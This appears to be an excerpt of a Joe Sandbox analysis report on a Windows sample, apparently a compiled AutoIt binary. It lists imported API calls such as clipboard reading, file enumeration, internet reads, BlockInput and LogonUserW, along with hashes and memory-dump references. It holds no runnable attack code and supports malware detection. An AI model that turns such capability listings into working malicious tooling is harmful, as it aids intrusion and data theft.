                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                  • String ID:
                                                                                  • API String ID: 292994002-0
                                                                                  • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                  • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                  • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                  • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                  APIs
                                                                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                  • CloseClipboard.USER32 ref: 0046DD0D
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                  • CloseClipboard.USER32 ref: 0046DD41
                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                  • CloseClipboard.USER32 ref: 0046DD99
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                  • String ID:
                                                                                  • API String ID: 15083398-0
                                                                                  • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                  • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                  • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                  • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: U$\
                                                                                  • API String ID: 4104443479-100911408
                                                                                  • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                  • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                  • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                  • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                  • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                  • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                  • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNEL32(?,?), ref: 004339C7
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                  • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                  • String ID:
                                                                                  • API String ID: 48322524-0
                                                                                  • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                  • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                  • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                  • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                  APIs
                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                  • String ID:
                                                                                  • API String ID: 901099227-0
                                                                                  • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                  • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                  • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                  • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                  APIs
                                                                                  • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Proc
                                                                                  • String ID:
                                                                                  • API String ID: 2346855178-0
                                                                                  • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                  • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                  • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                  • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                  APIs
                                                                                  • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlockInput
                                                                                  • String ID:
                                                                                  • API String ID: 3456056419-0
                                                                                  • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                  • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                  • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                  • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                  APIs
                                                                                  • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: LogonUser
                                                                                  • String ID:
                                                                                  • API String ID: 1244722697-0
                                                                                  • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                  • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                  • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                  • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                  • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                  • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                  • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                  • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                  • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                  • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: N@
                                                                                  • API String ID: 0-1509896676
                                                                                  • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                  • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                  • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                  • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                  • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                  • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                  • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                  • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                  • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                  • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                  • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                  • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                  • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                  • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                  APIs
                                                                                  • DeleteObject.GDI32(?), ref: 0045953B
                                                                                  • DeleteObject.GDI32(?), ref: 00459551
                                                                                  • DestroyWindow.USER32(?), ref: 00459563
                                                                                  • GetDesktopWindow.USER32 ref: 00459581
                                                                                  • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                  • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                  • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                  • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                  • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004597E2
